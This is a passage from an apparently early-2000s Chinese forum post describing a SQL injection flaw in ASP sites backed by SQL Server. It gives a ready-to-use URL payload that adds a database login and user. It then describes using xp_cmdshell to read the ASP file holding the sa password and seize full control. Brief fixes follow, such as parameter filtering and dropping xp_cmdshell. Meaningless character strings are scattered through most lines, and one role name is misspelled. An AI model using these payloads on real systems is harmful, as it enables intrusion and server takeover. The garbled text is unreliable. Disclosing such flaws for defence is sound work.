找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 7263|回复: 0

ASP程序+数据库安全一例

[复制链接]
发表于 2002-2-10 17:14:05 | 显示全部楼层 |阅读模式
为了考证这种类型的程序BUG,笔者最近去了很多用ASP和SQL SERVER做的网站,发现绝大部分网站的程序有这个BUG,于是觉得有必要把这个问题贴出,以免大家犯同样的错误。0 _9 e# [) d4 M+ {
  BUG描述:& n) x5 m$ k) ]( H0 Q
  把一个有参数的xxx.asp?x=x程序变成xxx.asp?x=x;use pubs;exec sp_addlogin 'admin','admin','master';exec sp_adduser 'admin','admin','db_ower';--
5 Z4 ]% I: W5 i! i3 o& V  BUG讲解:+ E  Z5 ]1 e& O4 D
  这个BUG是利用参数未过滤来执行SQL语句增加一个用户,然后可以用此用户连上SQL SERVER,再通过exec xp_cmdshell 'type x.asp'来查看存有sa密码的ASP文件来获得SQL SERVER的最高权限。
) J' ^6 Q: @8 a5 m8 ?5 u  BUG消除:
: h1 x# j4 X" D8 o' H; s; ?  程序增加参数过滤( f" J- m$ X7 O5 s: p; G
  附:sp_addlogin和sp_adduser语法' G  r" b. y) h0 o& w# x
sp_addlogin [@loginame =] 'login'4 p$ K; T# o4 f- w, U; J
  [,][@passwd =] 'password']
# x% _& j5 k+ ~* ]  [,][@defdb =] 'database']. W* j) Y+ {& P3 X& k9 c) ~" D
  [,][@deflanguage =] 'language']: d* v7 v. j# p; e5 v
  [,[@sid =] 'sid']
/ J; r( _2 `0 }  ]" b4 Y2 j  [,][@encryptopt =] 'encryption_option']6 M7 v3 c6 ^7 ~
sp_adduser [@loginame =] 'login'
/ Y8 e! P4 o5 I" J( j8 c  [,][@name_in_db =] 'user']
- G- u& o6 d/ U0 c+ ~3 {  [,][@grpname =] 'group']" J# L5 v: C( u7 J0 d0 f) K
  注:如果采取SQL SERVER设为本地连接、改变端品号、drop xp_cmdshell等等可以防止很多攻击行为呀 ^_^
" Y9 \: n8 N) g  o# D嘿嘿,这个BUG还可以用来改administrator的密码,让服务器关机等等0 ?9 T3 C+ P1 b5 L2 r
*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

Archiver|小黑屋|宽带技术网 |网站地图 粤公网安备44152102000001号

GMT+8, 2026-2-1 16:08 , Processed in 0.027740 second(s), 4 queries , Redis On.

Powered by Discuz! X3.5 Licensed

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表